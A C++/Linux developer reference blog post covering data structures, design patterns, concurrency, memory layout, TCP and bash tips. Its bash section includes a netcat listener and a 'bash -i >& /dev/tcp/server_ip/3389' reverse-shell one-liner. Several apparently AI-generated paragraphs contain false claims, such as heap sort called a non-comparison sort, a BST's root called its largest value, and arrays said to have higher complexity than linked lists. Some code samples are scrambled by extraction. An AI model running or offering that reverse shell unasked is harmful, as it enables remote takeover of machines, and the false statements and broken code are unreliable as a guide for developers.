A Computer Science survival guide for C++/Linux developers
Thu Nov 30 05:04:02 UTC 2023
Let’s start with a haiku written by a computer.
C++ code so vast
Creating wonders so fast
Mysteries unfold
This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.
If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.
The C++ Standard Library containers provide a set of powerful and efficient data structures that make it easy to store and manipulate data. They are also highly optimized for performance, making them ideal for applications that require fast access to data. They are also highly portable and can be used across different platforms and architectures. The containers also provide a convenient way to manage memory, allowing for efficient memory management and reducing the risk of memory leaks. Finally, the containers provide rich API features and support for a variety of algorithms, making it easier to develop high-performance applications.
Sequence containers are data structures that store elements in a linear, ordered fashion. Examples include vectors, deques, and lists.
Associative containers are data structures that store elements in an unordered fashion, but provide access to elements via a key. Examples include maps, sets, and unordered_maps.
You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.
Complexity | Notation |
---|---|
Constant | O(1) |
Logarithmic | O(log n) |
Linear | O(n) |
Quadratic | O(n2) |
Exponential | O(2n) |
Linked lists have an average complexity of O(n), while arrays have an average complexity of O(1). Arrays have a higher average complexity than linked lists, as they can access elements quickly and efficiently. However, linked lists are better for inserting and deleting elements as they can be done in constant time.
A test is not a unit test if:
See the complete article.
For simple readonly types, pass by const value.
void func(const int p) {
}
For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.
void func(const big_type& p) {
}
If the first thing you do is make a copy, pass by non-const value.
void func(int p) {
}
If you want to modify the caller’s copy, pass by non-const reference.
void func(int& p) {
}
The only difference between a class and a struct is the default access level: public, protected, private.
But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)
Either way, you can test your assertions at compile time with
static_assert
and the type
traits header.
struct A {
// public: <-- default for structs
int x_;
};
If the data are constrained by an invariant – i.e., not all values are valid – use a class.
class B {
private: // <-- default for classes
int x_; // must be between 0-1000
};
Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide a common language that designers and developers can use to communicate solutions to recurring problems and to make it easier to create more flexible, robust, and maintainable code. Design patterns also help developers to better understand the underlying software architecture, which in turn helps to create better software.
The factory design pattern is a creational design pattern that provides a way to encapsulate object creation code, allowing for the abstraction of the object creation process and the decoupling of the use of an object from its implementation. The pattern involves a factory object that is responsible for creating other objects based on some set of input. This allows for a single point of control for object creation, and allows for the flexibility of creating different types of objects based on the input.
Store a system configuration in an external text file and construct at runtime using the factory pattern.
The visitor design pattern is a behavioral design pattern that allows for the manipulation of individual objects within a larger collection of objects. This pattern uses a separate "visitor" object which is responsible for applying a specific operation to each object in a collection. The visitor object is able to traverse the collection and apply the desired operation to each object without having the knowledge of the structure of the collection itself. This enables the application of new operations to existing collections without having to modify the collection’s structure. Additionally, the visitor pattern allows for multiple operations to be applied to the collection’s objects with the same visitor.
The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”
Double dispatch in subtype polymorphism is a method of dispatching a function call to different implementations based on the runtime type of two objects involved in the method call. It works by having a method on one object call a method on the other object, passing in the type of the first object. The second object then uses the type information to determine which implementation to use for the method call. This allows for more specific and dynamic behavior than traditional single dispatch polymorphism.
Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
Hardware interface classes will typically be a const
register map which is a flyweight pattern. This is also an example of a
singleton pattern as it’s only initialised once regardless of how many
instances are created. Additionally if registers are actually wired to
discrete lines they might be read-only, so the memento pattern is used
to store the internal state.
“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”
See Wikipedia.
Dependency inversion is a software design principle that states that high-level modules should not depend on low-level modules, but rather they should both depend on abstractions. This principle helps to invert the dependencies between software components, helping to decouple software systems and reduce the risk of changes in one module breaking the other.
Object-oriented programming (OOP) is a programming paradigm that uses objects and their interactions to design applications and computer programs. OOP focuses on the creation of reusable code through the use of classes and objects. It emphasizes data abstraction and promotes code reusability by creating relationships between objects. OOP is based on the concept of encapsulation that allows data and functions to be bundled together in an object, and polymorphism which allows objects to take different forms. OOP also makes it easier to manage complex programs by providing structure and organization.
Ad-hoc Polymorphism: Ad-hoc polymorphism, also known as overloading, is a type of polymorphism in which a single function or operator can operate on multiple types of data.
Parametric Polymorphism: Parametric polymorphism is a type of polymorphism in which a function or operator can take arguments of different types and can produce a different result based on the argument type.
Subtype Polymorphism: Subtype polymorphism is a type of polymorphism in which an object can have multiple types, and the behavior of the object depends on the type. This type of polymorphism is often referred to as inheritance.
Coercion Polymorphism: Coercion polymorphism is a type of polymorphism in which an object of one type is automatically converted into an object of another type. This type of polymorphism helps to reduce the amount of code needed to write programs.
A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.
Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.
The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).
In derived classes, you should mark overridden methods as
override
to express intention and also protect from the
base class being changed unwittingly.
A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)
A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.
RAII stands for Resource Acquisition Is Initialization. It is a programming idiom used in C++ to ensure that resources that are acquired are properly released when no longer needed, regardless of how the code using the resource exits. It is achieved by tying resource lifetime to object lifetime; when an object is created, it acquires the resource, and when the object is destroyed, the resource is released automatically. This prevents memory leaks and other errors caused by the incorrect management of resources.
The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.
Quicksort is the poster boy of sorting algorithms.
The time complexity of quicksort is O(n log n) on average, and O(n^2) in the worst case.
Below is a Python implementation just for fun. But how is it implemented in C++?
def quicksort(arr):
if len(arr) <= 1:
return arr
= arr[len(arr) // 2]
pivot = [x for x in arr if x < pivot]
left = [x for x in arr if x == pivot]
middle = [x for x in arr if x > pivot]
right return quicksort(left) + middle + quicksort(right)
print(quicksort([3,6,8,10,1,2,1])) # Prints [1, 1, 2, 3, 6, 8, 10]
Introsort is a sorting algorithm that combines the best features of quicksort and heapsort. It starts with quicksort, which is used to partition the data into two sub-arrays based on a chosen pivot element. If the sub-arrays become too unbalanced, the algorithm switches to heapsort, which is a more stable sorting method. Finally, if the heapsort phase takes too long, the algorithm falls back to a simple insertion sort. This combination of algorithms provides a fast and efficient sorting method with good space complexity.
Introsort is in place but not stable: i.e., equivalent
elements are not guaranteed to remain in the same order. However, the
Standard Library offers stable_
versions of various sorting
algorithms.
If additional memory is available,
stable_sort
remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.
https://leanpub.com/cpp-algorithms-guide
The threshold for switching to insertion sort varies for each compiler.
std::list
std::sort
requires random access to the elements, so
std::list
has its own sort method, but it still
(approximately) conforms to O(n log n). It can be implemented with merge
sort as moving elements is cheap with a linked list.
Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.
The complexity of different sorting algorithms can vary widely. The most common sorting algorithms can be divided into two categories: comparison sorts and non-comparison sorts.
Comparison sorts are algorithms that compare each element in the array to the other elements in order to sort them. Examples of comparison sorts include Bubble Sort, Insertion Sort, Selection Sort, Merge Sort, and Quick Sort. The time complexity of these sorting algorithms ranges from O(n2) for Bubble Sort and Insertion Sort, to O(nlogn) for Merge Sort and Quick Sort.
Non-comparison sorts are algorithms that do not compare the elements in the array in order to sort them. Examples of non-comparison sorts include Counting Sort, Radix Sort, Bucket Sort, and Heap Sort. The time complexity of these sorting algorithms ranges from O(n) for Counting Sort and Radix Sort, to O(nlogn) for Bucket Sort and Heap Sort.
Overall, the most efficient sorting algorithms are Merge Sort and Quick Sort, both of which have a time complexity of O(nlogn).
All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.
What is your experience with object-oriented programming?
Describe a project you have worked on that involved working with a large dataset.
What challenges have you faced when debugging a complex algorithm?
Explain the differences between a relational database and a non-relational database.
How would you go about designing a web application from scratch?
What is the difference between C and C++?
What is polymorphism and how is it implemented in C++?
What are the advantages and disadvantages of using templates in C++?
What is a namespace and how is it used in C++?
How does memory management work in C++?
This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.
std::move
&&
modifier indicates parameter is an object
that we intend to move from instead of copyingnoexcept
(they are anyway)noexcept
Processor caches are small, high-speed memory caches located on the processor or close to the processor. They store frequently used instructions and data so that the processor can access them quickly, allowing for faster processing speeds. Caches come in various sizes, with larger caches allowing for faster access to instructions and data. By caching the data, the processor does not need to access the main memory as often, which reduces the time it takes to complete tasks.
Cache coherence is a property of a multiprocessor system in which all the processors share the same memory. It ensures that when one processor modifies a memory location, the other processors can see the change. This is achieved by maintaining a consistent view of the data in the memory across all processors. Cache coherence protocols ensure that the caches remain consistent by using a variety of techniques such as snooping, broadcast, invalidation, and bus locking. These protocols ensure that the data in the caches is consistent, and that the caches remain coherent.
There are three kinds of cache misses:
Cache misses occur when the data that is requested by the CPU is not present in the cache. This can result in increased latency as the CPU has to go out to main memory to fetch the data. The more cache misses that occur, the slower the overall system performance will be.
+ (vec.size() & 1)
The way virtual functions work may cause issues with caching.
But we may be able to use CRTP to avoid the first two.
Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.
Design to get the most value out of every single cacheline that is read. Split apart the functions and data.
Cache locality is a concept in computer architecture which states that programs tend to access data items that are clustered together in memory. This means that if a program accesses one data item, the next one it accesses is likely to be located in the same or nearby memory locations. This can create performance improvements due to the fact that data items can be fetched from the processor’s cache rather than the main memory, resulting in faster access times.
Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.
Notice begin and end parameters don’t specify a namespace, see ADL.
#include <iostream>
#include <vector>
#include <iterator>
int main() {
const std::vector v{1, 2, 3, 4, 5};
std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}
A hash function is a mathematical function that takes an input of any size and produces an output, called a hash, of a fixed size. It is used to generate a unique value for a given data set or item, usually for data security and integrity purposes. Hash functions are commonly used in data structures and algorithms, as well as in cryptography.
Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.
See wikipedia.
time/program = instructions/program * clockCycles/instruction * time/clockCycles
Amdahl’s law is a principle that states that the speedup of a program or system using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. The law is named after computer scientist Gene Amdahl, and was presented in his 1967 article "Validity of the Single Processor Approach to Achieving Large-Scale Computing Capabilities". The speedup in performance of a program or system is limited by the time needed for the part of the program that cannot be parallelized. This law implies that not all tasks can be accelerated by adding more processors.
It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.
Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.
Why use multithreading? For performance and/or separation of concerns.
A routine can be described as reentrant if it can be interrupted without an not leave the operation partially complete: the invariants remain true.
A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.
OpenAI: Invariants are mathematical statements or logical expressions that remain true in all possible scenarios or under certain conditions. They are used in computer science to define properties of a system that should be maintained in order to ensure the correctness of the system, or to prove the correctness of a system. In other words, invariants are properties of a system that do not change over time.
A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.
tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”
OpenAI: Race conditions in computer science refer to situations in which the output of a computer program or system depends on the sequence or timing of other uncontrollable events. This can occur when two or more processes or threads are trying to access or modify the same data at the same time. If the order of access is not defined, a race condition can occur, resulting in unexpected or incorrect output. The term is most commonly used in the context of multi-threaded programs, but race conditions can occur in any type of computer program.
See the Dining philosophers problem.
A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.
A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.
OpenAI: Deadlocks occur when two or more threads, processes, or transactions are waiting for each other to finish, but they never do. This can cause a system to become unresponsive. Livelocks are similar to deadlocks, but instead of threads waiting for each other to finish, they continuously change their state in response to the other threads. This can cause a system to become unresponsive as well.
Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.
OpenAI: 1. Avoid long-running transactions: If possible, avoid running long-running transactions.
Use a lock timeout: A lock timeout allows the system to abort the transaction if a lock can’t be acquired in a certain amount of time.
Use lock escalation: Lock escalation reduces the number of locks required for a transaction by using higher-level locks.
Use deadlock detection and resolution: Deadlock detection and resolution algorithms can be used to detect and resolve deadlocks.
Use read-committed isolation levels: This isolation level reduces the likelihood of deadlocks by only allowing a transaction to acquire locks on resources that it needs to update.
Use multiple granular locks: This reduces the likelihood of a deadlock by ensuring that locks are acquired on resources in a predictable order.
Design transactions carefully: Careful design of transactions can reduce the likelihood of deadlocks by ensuring that locks are acquired in the correct order.
std::scoped_lock
OpenAI: Mutex and semaphore are both synchronization primitives that are used to control access to shared resources.
A mutex is a locking mechanism that is used to synchronize access to a resource by multiple threads. It is "locked" by one thread and "unlocked" by another, allowing only one thread at a time to access the resource.
A semaphore is a signaling mechanism that allows threads to communicate with each other. It is used to signal when a resource is available or when a certain condition has been met. Unlike a mutex, a semaphore can be used to allow multiple threads to access a resource simultaneously.
See Mutex vs Semaphore.
This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.
tl;dr A thread is a branch of execution. A process can consist of multiple threads.
OpenAI: Threads and processes are both ways of running instructions on a computer. A thread is a single sequence of instructions within a process while a process is a program running on the computer. Threads can be thought of as multiple lines of instruction within a process. Processes have their own memory address space and resources, while threads share the same memory address space and resources as the process they are part of. Threads are typically faster than processes as they can share data and resources more efficiently. Processes are more secure as they have their own memory address space and resources, which prevents one process from accessing the resources of another.
See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.
Section | Description |
---|---|
stack / | Local variables |
heap /\ | Dynamic memory |
.rodata |
Read-only data |
.bss |
Uninitialised data |
.data |
Initialised data |
.text |
Code |
Text Segment: This is the code segment which contains the actual instructions to be executed. It usually contains the program code, as well as any constants and variables used by the program.
Data Segment: This segment contains initialized and uninitialized data used by the program.
BSS Segment: This segment contains uninitialized data such as global variables and static variables.
Heap Segment: This segment is used to store dynamically allocated memory.
Stack Segment: This segment is used to store local variables and function parameters.
Internal Linkage: Objects with internal linkage are only visible within the translation unit (TU) in which they are defined. This means that they can’t be used in other TUs. In C++, static variables and functions have internal linkage.
External Linkage: Objects with external linkage are visible to all other TUs in a program. This means that variables and functions with external linkage can be used in multiple TUs. In C++, variables and functions that are declared without the static keyword have external linkage.
Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.
http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco
If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
std::call_once
vs double checked lockingUsed to declare many things with internal linkage.
namespace {
int a = 0;
int b = 0;
int c = 0;
}
This is all a lot easier since std::thread
was
introduced in C++11. Now we have a platform dependent interface. See the
C++ concurrency support library
examples.
However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?
std::async
Think of it like pushing a calculation into the background.
std::async
executes a function asynchronously and returns a
std::future
that will eventually hold the result of that
function call. Quite a nice way to reference the result of a calculation
executed in another thread. Also, it manages the issue of creating too
many threads – they will just be executed sequentially. Additionally,
exceptions thrown in the asynchronous routine destroy the future and the
exception is rethrown by the calling get()
routine.
std::thread
You need to call join()
for every thread created with
std::thread
. This can be done by storing your threads as a
vector and joining each of them in a loop.
std::jthread
Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.
Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.
std::execution::seq
: execution may not be
parallelizedstd::execution::par
: execution may be parallelizedstd::execution::par_unseq
: execution may be
parallelized, vectorized, or migrated across threads (such as by a
parent-stealing scheduler)std::execution::unseq
: execution may be vectorized,
e.g., executed on a single thread using instructions that operate on
multiple data itemsSome of these have an _if
version that takes a
additional predicate: e.g., std::replace
and
std::replace_if
.
std::sort
std::copy
std::transform
std::accumulate
std::for_each
std::reduce
std::inclusive_scan
std::exclusive_scan
std::transform_reduce
std::remove
std::count
std::max_element
std::min_element
std::find
std::generate
std::mutex
A standard way to protect access to something, but there are multiple ways to unlock it.
Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.
You can use std::scoped_lock
with multiple resources or
single, but also I think it expresses intention better, by virtue of
having “scope” in the name.
std::mutex
std::atomic
std::scoped_lock
std::lock_guard
std::thread
and std::join
std::jthread
(auto join)See the Standard Library concurrency support library.
#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>
const int MAX_SIZE = 10;
std::mutex m;
std::condition_variable cv;
std::queue<int> q;
void producer()
{
int i = 0;
while (true) {
std::unique_lock<std::mutex> lk(m);
.wait(lk, [] {return q.size() < MAX_SIZE; });
cv
.push(i++);
qstd::cout << \"Produced \" << i - 1 << std::endl;
.unlock();
lk.notify_one();
cv}
}
void consumer()
{
while (true) {
std::unique_lock<std::mutex> lk(m);
.wait(lk, [] {return q.size() > 0; });
cv
int item = q.front();
.pop();
qstd::cout << \"Consumed \" << item << std::endl;
.unlock();
lk.notify_one();
cv}
}
int main()
{
std::thread t1(producer);
std::thread t2(consumer);
.join();
t1.join();
t2return 0;
}
Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.
Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.
Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.
Verification is objective (quality), validation is subjective (customer needs).
Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.
See difference between verification and validation.
What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.
Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.
As a [X] I want [Y] in order to [Z]
In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.
1 000 kilo | milli .001
1 000 000 mega | micro .000 001
1 000 000 000 giga | nano .000 000 001
1 000 000 000 000 tera | pico .000 000 000 001
1 000 000 000 000 000 peta | femto .000 000 000 000 001
1 000 000 000 000 000 000 exa | atto .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001
See list of SI prefixes.
You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.
See why is everyone in such a rush?
1/1000000000 second == 1 nanosecond
Approximate durations of typical operations (rounded to help remember.)
Action | Duration (nanoseconds) |
---|---|
L1 cache read, variable increment | <1 |
Branch misprediction (how do you measure this?) | 5 |
L2 cache read, std::atomic |
10 |
std::mutex/scoped_lock |
20 |
Fetch from main memory | 100 |
Semaphore acquire | 200 |
Send 2KiB over 1Gbps network | 20,000 |
Create a std::thread |
20,000 |
Send packet from US to Europe and back | 200,000,000 |
“Generic programming is why we can’t have nice things” – Andrei Alexandrescu
constexpr
– find undefined behaviour at compile
timeTemplate metaprogramming is a programming technique in which templates are used to generate program code during compilation. It is a powerful and efficient way to create generic algorithms and data structures, and to optimize code. Template metaprogramming is based on the concept of meta-programming, which uses templates as a form of compile time code generation. The main advantage of template metaprogramming is that it allows developers to write code that is both highly efficient and highly expressive, while still being maintainable and readable. Template metaprogramming can also be used to create code that is more type-safe than traditional code.
Templates are used in the C++ Standard Library to allow functions and classes to operate with a range of data types without the need for a programmer to create a separate version of the function or class for each type. This allows functions and classes to be written once and used with any data type that can meet the requirements of the function or class. Templates also provide type safety, ensuring that the correct type is used when calling a function or creating an instance of a class.
SFINAE stands for Substitution Failure Is Not An Error. It is a feature in C++ which allows for specific compiler error messages when a substitution fails during template instantiation. This prevents undesired behavior or compiler errors when an incorrect substitution is attempted. SFINAE allows for the compiler to ignore invalid template specialization attempts, and allows for the user to include multiple template instantiations without the compiler raising an error. This feature is often used to control template argument deduction, as well as to create type traits.
See OSI on Wikipedia.
Layer | Description |
---|---|
Layer 7 | Application |
Layer 6 | Presentation |
Layer 5 | Session |
Layer 4 | Transport |
Layer 3 | Network |
Layer 2 | Data Link |
Layer 1 | Physical |
The TCP three way handshake begins when a client sends a TCP SYN (synchronize) packet to a server. The SYN packet contains the initial sequence number for the client.
The server responds with a SYN-ACK (synchronize-acknowledge) packet, which contains the initial sequence number for the server and an acknowledgment of the client’s initial sequence number.
The client then sends an ACK (acknowledge) packet to the server, which acknowledges the server’s initial sequence number. This completes the three way handshake and establishes a connection between the two hosts.
SYN stands for “synchronise”.
=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK
As a Linux developer you need a strong command line game.
bash
is ubiquitous, and a powerful language in itself,
without resorting to something like Python.
git
is awesome on the command line and pretty much
essential. Use it to manage your chores. See how
to undo almost anything with git.
(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80
# server
nc -knvlp 3389
# client
bash -i >& /dev/tcp/server_ip/3389 0>&1
git add !(unit.md)
shuf -n 1 readme.txt
From bash 5.
echo $EPOCHREALTIME
1614870873.574544
echo $EPOCHSECONDS
1614870876
The three load average values are 1, 5 and 15 minutes.
uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51
Stress your system in different ways.
stress --cpu 8
echo $(nproc)
localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut
mv {,_}.bash_history
watch -d ip a
pushd
equivalentI use this all the time. Rather than pushd
and
popd
to navigate around the file system:
# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post
# Return whence you came
cd -
It’s important to know the common data structures and their characteristics.
std::vector
std::vector
is the go-to container, so let’s give it
some special attention. It has contiguous storage – therefore cache
friendly – and uses the RAII
paradigm: the data are created on the heap and the allocation and
deallocation (new/delete) are handled for you. Interestingly,
std::string
exhibits many of the same characteristics, but
it’s not quite containery enough to qualify.
Estimate how many times the fax
destructor is called
below.
#include <iostream>
#include <vector>
auto x = 0uz;
int main() {
struct fax {
// Constructor and destructor
() { std::cout << x << " ctor\n"; }
fax~fax() { std::cout << "\t" << x << " dtor\n"; }
// Copy constructors
(const fax&) { std::cout << x << " copy ctor\n"; };
fax(fax&&) { std::cout << x << " move ctor\n"; };
fax
// Assignment constructors
& operator=(const fax&) {
faxstd::cout << x << " copy assignment ctor\n";
return *this;
}
& operator=(fax&&) {
faxstd::cout << x << " move assignment ctor\n";
return *this;
};
const size_t id = x++;
};
std::vector<fax> y;
// Reduce copies by allocating up front
// y.reserve(3);
for (size_t i = 0; i < 3; ++i) {
.push_back(fax{});
ystd::cout << "-- capacity " << y.capacity() << " --\n";
}
// fax f1 = fax{};
// fax f2 = std::move(fax{});
}
}
See the program output (below), note how the capacity is growing exponentially (doubling each time).
1 ctor
2 move ctor
2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
5 dtor
5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
9 dtor
9 dtor
9 dtor
-- capacity 4 --
9 dtor
9 dtor
9 dtor
For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.
Binary search trees have an amortized complexity of O(log n) unless
the tree is unbalanced. Worst case, if the tree is unbalanced, then it
is O(n). std::set
and std::map
are implemented
using a red-black tree, a type of balanced binary search tree. C++23
introduces std::flat_map
which is implemented using
contiguous storage to make it more cache-friendly.
A binary search tree (BST) is a type of data structure which is used to store data in a specific order. It is a type of binary tree where each node has at most two children, which are referred to as the left child and the right child. The left subtree of a node contains only nodes with values less than the parent node, while the right subtree of a node contains only nodes with values greater than the parent node. The root node of a BST is the node with the largest value. The BST is very efficient for searching and sorting because it allows quick access to the data.
A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.
Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.
e| /e
d| d
c| / \c
b| b
a| / \ /a
9|----- / 9
8| / \8
7| 7
6| \ /6
5|----- \ 5
4| \ / \4
3| 3
2| \ /2
1| 1
0| \0
Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.
std::unordered_set
and std::unordered_map
are implemented using hash tables.
A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.
Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.
123456789abcedef
1
23
4567
89abcdef
Project down, the top of the tree is a smallest element.
1
2 3
4 5 6 7
8 9 a b c d e f
1
/ \
\
/ \
/
2 3/ \ / \
4 5 6 7/ \ / \ / \ / \
8 9 a b c d e f
A heap is a special type of tree-based data structure that stores data in a specific way such that it can be efficiently accessed. Heaps are typically implemented as binary trees, and the elements stored in a heap must have a specific order. Heaps are commonly used for priority queues, and can also be used for sorting.
A binary search tree (BST) is a type of tree-based data structure that can be used to store data in an organized way. BSTs are typically implemented as binary trees, and the elements stored in a BST must have a specific order. BSTs are commonly used for searching and sorting data, and can also be used to store data in an efficient manner. Unlike heaps, BSTs do not have a specific order and can be traversed in any order.
Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).
std::forward_list
is a singly linked list.
Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).
std::list
is a doubly linked list.
Container | Insertion | Deletion | Lookup |
---|---|---|---|
vector | O(1) | O(n) | O(n) |
list | O(1) | O(1) | O(n) |
set | O(log n) | O(log n) | O(log n) |
map | O(log n) | O(log n) | O(log n) |
unordered_set | O(1) | O(1) | O(1) |
unordered_map | O(1) | O(1) | O(1) |
However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.
As of 7 September 2023:
The big things for me are ranges and views, so effortlessly express
and manipulate ranges of data with zero iterators; they read naturally
and are also lazy-evaluated (looking forward to
ranges_to<>
). Concepts I’ve used a little, but mostly
to narrow the allowed types of an auto parameter: e.g.,
std::floating_point auto
.
I’ve attempted to deep dive into templates a few times and it’s
really quite an unpleasant language! However, whilst not a recent
addition, constexpr
is becoming increasingly supported; it
gives you the readability of “normal” code with the potential
performance benefits of compile-time. And it also finds UB! However, you
quickly hit the issue where something isn’t constexpr
so
you have to either implement it yourself or not bother.
Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator should be an interesting addition.
Things that are in the standard but aren’t properly supported:
modules haven’t yet been implemented sufficiently in gcc or clang.
std::print
is really cool but you still need to install a
separate library (fmtlib
).
Notable mentions from C++17 are structured bindings and execution policy.
See the presentation by Marc Gregoire (CppCon 2022).
data[x, y, z]
and
std::mdspan
consteval
– immediate functions: only execute at
compile timeuz
literals<generator>
.contains
for strings and containers<stack_trace>
std::expected
std::byteswap
constexpr
for std::optional
and
std::variant
std::ranges::fold_left
(gcc 13.1)std::views::slide
std::views::enumerate
(gcc 13.2) – easily enumerate
your range-based for loops, you get a pair of index and the element[[assume(true)]]
– help introduce UB into your code
with assumptionsNot supported in gcc 13.2.
std::print
std::flat_map
and
std::flat_set
